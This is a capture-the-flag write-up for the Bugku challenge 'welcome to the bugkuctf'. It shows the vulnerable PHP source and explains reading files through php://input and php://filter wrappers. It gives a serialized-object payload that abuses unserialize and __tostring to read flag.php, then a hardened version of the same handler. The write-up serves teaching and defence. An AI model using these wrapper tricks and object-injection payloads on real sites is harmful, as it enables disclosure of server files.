Using php://filter: bugku welcome to the bugkuctf

Challenge: welcome to the bugkuctf

Challenge description: viewing the page source reveals the following:

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

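We need to pass three parameters:

1. user (the txt GET parameter) must be set, and the content read from it must be "welcome to the bugkuctf".
2. file needs to reach hint.php.
3. pass is not used.

Pass the parameters using php://input and php://filter. The response comes back base64-encoded; decoding it gives: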

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }  
    }  
}  
?>  

Changing hint.php to index.php gives:

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
        echo "不能現在就給你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
?>  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

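Based on the code analysis, we pass a Flag object in through pass. The serialized object payload is O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}, and with file set to hint.php we get the flag. file is hint.php so that the Flag class is defined before unserialize runs; echo $password then calls __tostring, which reads flag.php. The /flag/ check only inspects file, so it never sees the flag.php stored inside the object.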
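For comparison, a hardened handling of the same three parameters, as an added example that is not part of the challenge or the original write-up. The names PAGES, resolve_page, decode_password and handle are hypothetical, and handle returns a description instead of calling include so the script runs without hint.php on disk.

```php
<?php
// Added example (not the challenge's code): the same three inputs, handled safely.
declare(strict_types=1);

// Hypothetical allowlist: logical page name => fixed file on disk.
const PAGES = ['hint' => __DIR__ . '/hint.php'];

/** Resolve an include target; wrapper URLs and raw paths never reach include(). */
function resolve_page(string $name): ?string
{
    return PAGES[$name] ?? null;
}

/** Decode client data without instantiating classes, so no __toString gadget can run. */
function decode_password(string $raw): ?string
{
    $value = @unserialize($raw, ['allowed_classes' => false]);
    return is_string($value) ? $value : null; // objects become __PHP_Incomplete_Class
}

function handle(array $get): string
{
    // Compare the submitted text itself; never treat it as a filename or stream URL.
    $txt = $get['txt'] ?? '';
    if (!is_string($txt) || $txt !== 'welcome to the bugkuctf') {
        return 'denied';
    }
    $page = is_string($get['file'] ?? null) ? resolve_page($get['file']) : null;
    if ($page === null) {
        return 'unknown page';
    }
    $raw = $get['password'] ?? null;
    $password = is_string($raw) ? decode_password($raw) : null;
    // A real handler would include($page) here; this demo only reports the decision.
    return 'include ' . basename($page) . '; password=' . ($password ?? 'rejected');
}

// Constructed inputs mirroring the requests in this write-up (wrapper URL elided).
$ok = 'welcome to the bugkuctf';
$samples = [
    ['txt' => 'php://input', 'file' => 'hint', 'password' => 's:1:"x";'],
    ['txt' => $ok, 'file' => 'php://filter/...', 'password' => 's:1:"x";'],
    ['txt' => $ok, 'file' => 'hint', 'password' => 'O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}'],
    ['txt' => $ok, 'file' => 'hint', 'password' => 's:1:"x";'],
];
foreach ($samples as $get) {
    echo handle($get), PHP_EOL;
}
```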